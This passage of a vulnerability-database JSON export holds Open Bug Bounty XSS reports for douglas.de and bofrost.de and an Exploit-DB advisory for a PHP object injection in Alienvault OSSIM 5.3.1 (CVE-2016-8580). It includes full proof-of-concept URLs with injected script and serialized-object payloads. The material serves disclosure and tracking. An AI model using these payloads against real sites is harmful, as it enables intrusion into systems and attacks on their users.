https://www.douglas.de/search.html?query=kalender%20%22123%27xxxx%3Cdetails/open/ontoggle=alert`OPENBUGBOUNTY`%3E%3Csummary%3EClick%20me%20to%20demonstrate%20the%20XSS%3C/summary%3E%3C/details%3E&searchType;=search&init;=true\n \n\n##### Coordinated Disclosure Timeline\n\nDescription| Value \n---|--- \nVulnerability Reported:| 24 November, 2017 10:35 GMT \nVulnerability Verified:| 27 November, 2017 10:27 GMT \nWebsite Operator Notified:| 27 November, 2017 10:27 GMT \nPublic Report Published[without any technical details]:| 27 November, 2017 10:27 GMT \nVulnerability Fixed:| 30 November, -0001 00:00 GMT \nPublic Disclosure: A security researcher can delete the report before public disclosure, afterwards the report cannot be deleted or modified anymore. The researcher can also postpone public disclosure date as long as reasonably required to remediate the vulnerability.| 24 December, 2017 10:35 GMT\n", "published": "2017-11-24T10:35:00", "modified": "2017-12-24T10:35:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.openbugbounty.org/reports/429751/", "reporter": "ThomySec", "references": [], "cvelist": [], "lastseen": "2018-08-15T19:14:03", "history": [{"bulletin": {"id": "OBB:429751", "type": "openbugbounty", "bulletinFamily": "bugbounty", "title": "douglas.de XSS vulnerability", "description": "On the 24.11.2017 security researcher reported a XSS vulnerability affecting the douglas.de website via the Open Bug Bounty coordinated vulnerability disclosure program.\n\n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 24 November, 2017 10:35 GMT \nVulnerability existence verified and confirmed| 27 November, 2017 10:27 GMT \nGeneric security notifications sent to website owner| 27 November, 2017 10:27 GMT \nCustomized security notification sent to website owner| 27 November, 2017 10:27 GMT \n \nIf you are the website owner or administrator please [contact the researcher](<https://www.openbugbounty.org/researchers/ThomySec/>) directly to get vulnerability details and proceed to coordinated disclosure.\n", "published": "2017-11-24T10:35:00", "modified": "2017-11-27T10:27:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.openbugbounty.org/reports/429751/", "reporter": "ThomySec", "references": [], "cvelist": [], "lastseen": "2017-12-26T02:03:09", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 4.3, "modified": "2017-12-26T02:03:09"}}, "objectVersion": "1.4", "openbugbounty": {"patchStatus": "on hold", "mirror": ""}}, "lastseen": "2017-12-26T02:03:09", "differentElements": ["description", "modified", "openbugbounty", "title"], "edition": 1}, {"bulletin": {"id": "OBB:429751", "type": "openbugbounty", "bulletinFamily": "bugbounty", "title": "douglas.de XSS vulnerability ", "description": "##### Open Bug Bounty ID: OBB-429751\n\nDescription| Value \n---|--- \nAffected Website:| douglas.de \nVulnerable Application:| Custom Code \nVulnerability Type:| XSS (Cross Site Scripting) / CWE-79 \nCVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] \nRemediation Guide:| OWASP XSS Prevention Cheat Sheet \n \n##### Vulnerable URL:\n \n \n https://www.douglas.de/search.html?query=kalender%20%22123%27xxxx%3Cdetails/open/ontoggle=alert`OPENBUGBOUNTY`%3E%3Csummary%3EClick%20me%20to%20demonstrate%20the%20XSS%3C/summary%3E%3C/details%3E&searchType;=search&init;=true\n \n\n##### Coordinated Disclosure Timeline\n\nDescription| Value \n---|--- \nVulnerability Reported:| 24 November, 2017 10:35 GMT \nVulnerability Verified:| 27 November, 2017 10:27 GMT \nWebsite Operator Notified:| 27 November, 2017 10:27 GMT \nVulnerability Published:| 27 November, 2017 10:27 GMT[without any technical details] \nPublic Disclosure:| 22 February, 2018 10:35 GMT\n", "published": "2017-11-24T10:35:00", "modified": "2018-02-22T10:35:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.openbugbounty.org/reports/429751/", "reporter": "ThomySec", "references": [], "cvelist": [], "lastseen": "2018-03-15T00:01:09", "history": [], "viewCount": 0, "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "objectVersion": "1.4", "openbugbounty": {"patchStatus": "unpatched", "mirror": "http://429751.openbounty.org/mirror/"}}, "lastseen": "2018-03-15T00:01:09", "differentElements": ["description", "modified", "openbugbounty"], "edition": 2}], "viewCount": 4, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2018-08-15T19:14:03", "rev": 2}, "dependencies": {"references": [], "modified": "2018-08-15T19:14:03", "rev": 2}}, "objectVersion": "1.4", "openbugbounty": {"patchStatus": "patched", "mirror": "http://429751.openbounty.org/mirror/"}, "_object_type": "robots.models.openbugbounty.OpenbugbountyBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openbugbounty.OpenbugbountyBulletin"]}, {"id": "OBB:229754", "type": "openbugbounty", "bulletinFamily": "bugbounty", "title": "bofrost.de XSS vulnerability ", "description": "##### Open Bug Bounty ID: OBB-229754\n\nDescription| Value \n---|--- \nAffected Website:| bofrost.de \nOpen Bug Bounty Program:| Create your bounty program now. It's open and free. \nVulnerable Application:| Custom Code \nVulnerability Type:| XSS (Cross Site Scripting) / CWE-79 \nCVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] \nRemediation Guide:| OWASP XSS Prevention Cheat Sheet \n \n##### Vulnerable URL:\n \n \n http://www.bofrost.de/is-bin/INTERSHOP.enfinity/WFS/bofrost-shopDE-Site/de_DE/-/EUR/ViewParametricSearch-SimpleOfferSearch?PageSizeString=100&searchFromInput;=true&WFSimpleSearch;_NameOrID=frost+%22123%27,alert(%27OPENBUGBOUNTY%27),%27hzg%3Cizg%22jzgkzg%c0%bcgzh&x;=0&y;=0\n \n\n##### Coordinated Disclosure Timeline\n\nDescription| Value \n---|--- \nVulnerability Reported:| 30 April, 2017 20:41 GMT \nVulnerability Verified:| 30 April, 2017 20:44 GMT \nWebsite Operator Notified:| 30 April, 2017 20:44 GMT \nPublic Report Published[without any technical details]:| 30 April, 2017 20:44 GMT \nVulnerability Fixed:| 7 August, 2018 15:47 GMT \nPublic Disclosure: A security researcher can delete the report before public disclosure, afterwards the report cannot be deleted or modified anymore. The researcher can also postpone public disclosure date as long as reasonably required to remediate the vulnerability.| 30 May, 2017 20:41 GMT\n", "published": "2017-04-30T20:41:00", "modified": "2017-05-30T20:41:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.openbugbounty.org/reports/229754/", "reporter": "ThomySec", "references": [], "cvelist": [], "lastseen": "2018-08-15T21:37:21", "history": [{"bulletin": {"id": "OBB:229754", "type": "openbugbounty", "bulletinFamily": "bugbounty", "title": "bofrost.de XSS vulnerability ", "description": "##### Vulnerable URL:\n \n \n http://www.bofrost.de/is-bin/INTERSHOP.enfinity/WFS/bofrost-shopDE-Site/de_DE/-/EUR/ViewParametricSearch-SimpleOfferSearch?PageSizeString=100&searchFromInput;=true&WFSimpleSearch;_NameOrID=frost+%22123%27,alert(%27OPENBUGBOUNTY%27),%27hzg%3Cizg%22jzgkzg%c0%bcgzh&x;=0&y;=0\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| No \nLatest check for patch:| 28.07.2017 \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| 128697 \nVIP website status:| No \nCheck bofrost.de SSL connection:| (Grade: B) \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 30 April, 2017 20:41 GMT \nGeneric security notifications sent to website owner| 30 April, 2017 20:44 GMT \nCustomized security notification sent to website owner| 30 April, 2017 20:44 GMT \nVulnerability details disclosed by researcher| 14 May, 2017 21:14 GMT\n", "published": "2017-04-30T20:41:00", "modified": "2017-05-14T21:14:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.openbugbounty.org/reports/229754/", "reporter": "ThomySec", "references": [], "cvelist": [], "lastseen": "2017-10-16T23:57:32", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "openbugbounty": {"patchStatus": "unpatched", "mirror": ""}}, "lastseen": "2017-10-16T23:57:32", "differentElements": ["description", "modified", "openbugbounty"], "edition": 1}], "viewCount": 4, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-08-15T21:37:21", "rev": 2}, "dependencies": {"references": [], "modified": "2018-08-15T21:37:21", "rev": 2}}, "objectVersion": "1.4", "openbugbounty": {"patchStatus": "patched", "mirror": "http://229754.openbounty.org/mirror/"}, "_object_type": "robots.models.openbugbounty.OpenbugbountyBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openbugbounty.OpenbugbountyBulletin"]}], "exploitdb": [{"id": "EDB-ID:40682", "hash": "b160525b537f3cff992c86f236a74a66e6ba93053d601413a4c9a6634f2e8a52", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Alienvault OSSIM/USM 5.3.1 - PHP Object Injection", "description": "Alienvault OSSIM/USM 5.3.1 - PHP Object Injection. CVE-2016-8580. Webapps exploit for PHP platform", "published": "2016-11-02T00:00:00", "modified": "2016-11-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/40682/", "reporter": "Peter Lapp", "references": [], "cvelist": ["CVE-2016-8580"], "lastseen": "2016-11-02T17:29:55", "history": [{"lastseen": "2016-11-02T17:29:55", "different_elements": ["cvss3", "cvss2"], "edition": 1, "bulletin": {"lastseen": "2016-11-02T17:29:55", "references": [], "description": "Alienvault OSSIM/USM 5.3.1 - PHP Object Injection. CVE-2016-8580. Webapps exploit for PHP platform", "edition": 1, "cvss3": {}, "reporter": "Peter Lapp", "history": [], "published": "2016-11-02T00:00:00", "enchantments": {"score": {"rev": 2, "modified": "2016-11-02T17:29:55", "vector": "NONE", "value": 4.9}, "dependencies": {"rev": 2, "references": [{"idList": ["EXPLOITPACK:C90F1906FC7A0DD92BE17AD7BBC66B93"], "type": "exploitpack"}, {"idList": ["CVE-2016-8580"], "type": "cve"}, {"idList": ["PACKETSTORM:139488"], "type": "packetstorm"}, {"idList": ["1337DAY-ID-26207"], "type": "zdt"}, {"idList": ["EDB-ID:41424"], "type": "exploitdb"}], "modified": "2016-11-02T17:29:55"}}, "title": "Alienvault OSSIM/USM 5.3.1 - PHP Object Injection", "type": "exploitdb", "objectVersion": "1.5", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-8580"], "immutableFields": [], "modified": "2016-11-02T00:00:00", "href": "https://www.exploit-db.com/exploits/40682/", "id": "EDB-ID:40682", "viewCount": 7, "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "hashmap": [{"hash": "007c8c0ac4b216d1957c6862cb98a3aa", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c8f10ae6dd385b42570c5fa316079e39", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "722752975f594339c9a68309a61ecf41", "key": "href"}, {"hash": "916b5dbd201b469998d9b4a4c8bc4e08", "key": "type"}, {"hash": "6249051a0279d3205c62b5abbee8dab7", "key": "modified"}, {"hash": "6249051a0279d3205c62b5abbee8dab7", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "782c8f66c29acb85ed450172687799d2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "edb9033f2ac4258af52ffea35ff1a935", "key": "reporter"}], "hash": "eb363d4588aec9fbfb3bca3c952fb667e1efcb14adde5b169aa1232cac4872ae"}}], "viewCount": 7, "enchantments": {"score": {"value": 4.9, "vector": "NONE", "modified": "2016-11-02T17:29:55", "rev": 2}, "dependencies": {"references": [{"idList": ["EXPLOITPACK:C90F1906FC7A0DD92BE17AD7BBC66B93"], "type": "exploitpack"}, {"idList": ["CVE-2016-8580"], "type": "cve"}, {"idList": ["PACKETSTORM:139488"], "type": "packetstorm"}, {"idList": ["1337DAY-ID-26207"], "type": "zdt"}, {"idList": ["EDB-ID:41424"], "type": "exploitdb"}], "modified": "2016-11-02T17:29:55", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://www.exploit-db.com/download/40682/", "sourceData": "Details\r\n=======\r\n\r\nProduct: Alienvault OSSIM/USM\r\nVulnerability: PHP Object Injection\r\nAuthor: Peter Lapp, lappsec () gmail com\r\nCVE: CVE-2016-8580\r\nVulnerable Versions: <=5.3.1\r\nFixed Version: 5.3.2\r\n\r\n\r\n\r\nVulnerability Details\r\n=====================\r\n\r\nA PHP object injection vulnerability exists in multiple widget files\r\ndue to the unsafe use of the unserialize() function. The affected\r\nfiles include flow_chart.php, gauge.php, honeypot.php,\r\nimage.php,inventory.php, otx.php, rss.php, security.php, siem.php,\r\ntaxonomy.php, tickets.php, and url.php.\r\nAn authenticated attacker could send a serialized PHP object to one of\r\nthe vulnerable pages and potentially gain code execution via magic\r\nmethods in included classes.\r\n\r\n\r\n\r\nPOC\r\n====\r\n\r\nThis benign POC injects the IDS_Report class from PHPIDS into the\r\nrefresh parameter of image.php. The __toString method of IDS_Report is\r\nthen executed and the output is displayed in the value of the content\r\nfield in the response:\r\n\r\n/ossim/dashboard/sections/widgets/data/image.php?type=test&wtype=blah&height=1&range=1&class=1&id=&adj=1&value=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}\r\n\r\n\r\n\r\nTimeline\r\n========\r\n\r\n08/03/16 - Reported to Vendor\r\n10/03/16 - Fixed in version 5.3.2\r\n\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttps://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "scheme": null, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "007c8c0ac4b216d1957c6862cb98a3aa"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "cvss2", "hash": "27c7580c75f8189a2ddd31c96c2f7e2b"}, {"key": "cvss3", "hash": "48cec8f43ff700f672081508fe3d5099"}, {"key": "description", "hash": "c8f10ae6dd385b42570c5fa316079e39"}, {"key": "href", "hash": "722752975f594339c9a68309a61ecf41"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "6249051a0279d3205c62b5abbee8dab7"}, {"key": "published", "hash": "6249051a0279d3205c62b5abbee8dab7"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "edb9033f2ac4258af52ffea35ff1a935"}, {"key": "title", "hash": "782c8f66c29acb85ed450172687799d2"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:02", "references": [], "description": "\nAlienvault OSSIMUSM 5.3.1 - PHP Object Injection", "edition": 2, "reporter": "Peter Lapp", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2016-11-02T00:00:00", "title": "Alienvault OSSIMUSM 5.3.1 - PHP Object Injection", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"idList": ["EDB-ID:41424", "EDB-ID:40682"], "type": "exploitdb"}, {"idList": ["CVE-2016-8580"], "type": "cve"}, {"idList": ["PACKETSTORM:139488"], "type": "packetstorm"}, {"idList": ["1337DAY-ID-26207"], "type": "zdt"}], "modified": "2020-04-01T19:04:02", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2020-04-01T19:04:02", "rev": 2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8580"], "modified": "2016-11-02T00:00:00", "id": "EXPLOITPACK:C90F1906FC7A0DD92BE17AD7BBC66B93", "href": "", "viewCount": 3, "sourceData": "Details\n=======\n\nProduct: Alienvault OSSIM/USM\nVulnerability: PHP Object Injection\nAuthor: Peter Lapp, lappsec () gmail com\nCVE: CVE-2016-8580\nVulnerable Versions: <=5.3.1\nFixed Version: 5.3.2\n\n\n\nVulnerability Details\n=====================\n\nA PHP object injection vulnerability exists in multiple widget files\ndue to the unsafe use of the unserialize() function. The affected\nfiles include flow_chart.php, gauge.php, honeypot.php,\nimage.php,inventory.php, otx.php, rss.php, security.php, siem.php,\ntaxonomy.php, tickets.php, and url.php.\nAn authenticated attacker could send a serialized PHP object to one of\nthe vulnerable pages and potentially gain code execution via magic\nmethods in included classes.\n\n\n\nPOC\n====\n\nThis benign POC injects the IDS_Report class from PHPIDS into the\nrefresh parameter of image.php. The __toString method of IDS_Report is\nthen executed and the output is displayed in the value of the content\nfield in the response:\n\n/ossim/dashboard/sections/widgets/data/image.php?type=test&wtype=blah&height=1&range=1&class=1&id=&adj=1&value=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}\n\n\n\nTimeline\n========\n\n08/03/16 - Reported to Vendor\n10/03/16 - Fixed in version 5.3.2\n\n\n\nReferences\n==========\n\nhttps://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "objectVersion": "1.5", "scheme": null, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "history": [{"lastseen": "2020-04-01T19:04:02", "different_elements": ["cvss3", "cvss2"], "edition": 1, "bulletin": {"lastseen": "2020-04-01T19:04:02", "references": [], "description": "\nAlienvault OSSIMUSM 5.3.1 - PHP Object Injection", "edition": 1, "cvss3": {}, "reporter": "Peter Lapp", "history": [], "published": "2016-11-02T00:00:00", "enchantments": {"score": {"rev": 2, "modified": "2020-04-01T19:04:02", "vector": "NONE", "value": 6.3}, "dependencies": {"rev": 2, "references": [{"idList": ["EDB-ID:41424", "EDB-ID:40682"], "type": "exploitdb"}, {"idList": ["CVE-2016-8580"], "type": "cve"}, {"idList": ["PACKETSTORM:139488"], "type": "packetstorm"}, {"idList": ["1337DAY-ID-26207"], "type": "zdt"}], "modified": "2020-04-01T19:04:02"}}, "title": "Alienvault OSSIMUSM 5.3.1 - PHP Object Injection", "type": "exploitpack", "objectVersion": "1.5", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-8580"], "immutableFields": [], "modified": "2016-11-02T00:00:00", "href": "", "id": "EXPLOITPACK:C90F1906FC7A0DD92BE17AD7BBC66B93", "viewCount": 3, "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "hashmap": [{"hash": "007c8c0ac4b216d1957c6862cb98a3aa", "key": "cvelist"}, {"hash": "c90f1906fc7a0dd92be17ad7bbc66b93", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6249051a0279d3205c62b5abbee8dab7", "key": "modified"}, {"hash": "6249051a0279d3205c62b5abbee8dab7", "key": "published"}, {"hash": "aca037d6b71a6794ffbc919aafbef6ac", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "edb9033f2ac4258af52ffea35ff1a935", "key": "reporter"}, {"hash": "fd177c4def992a31aa69df208c3c9874", "key": "description"}], "hash": "9d91ceca0b68ef51ff06660f87dc47b44f6d92dd1bdb6e22fc584a69b474fb71"}}], "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "007c8c0ac4b216d1957c6862cb98a3aa"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "27c7580c75f8189a2ddd31c96c2f7e2b"}, {"key": "cvss3", "hash": "48cec8f43ff700f672081508fe3d5099"}, {"key": "description", "hash": "fd177c4def992a31aa69df208c3c9874"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "6249051a0279d3205c62b5abbee8dab7"}, {"key": "published", "hash": "6249051a0279d3205c62b5abbee8dab7"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "edb9033f2ac4258af52ffea35ff1a935"}, {"key": "title", "hash": "c90f1906fc7a0dd92be17ad7bbc66b93"}, {"key": "type", "hash": "aca037d6b71a6794ffbc919aafbef6ac"}], "hash": "e77e0359bd95cb06f829a81ed96529fa7bd2c0aae601ed27fcaf3e63fc64b604"}]}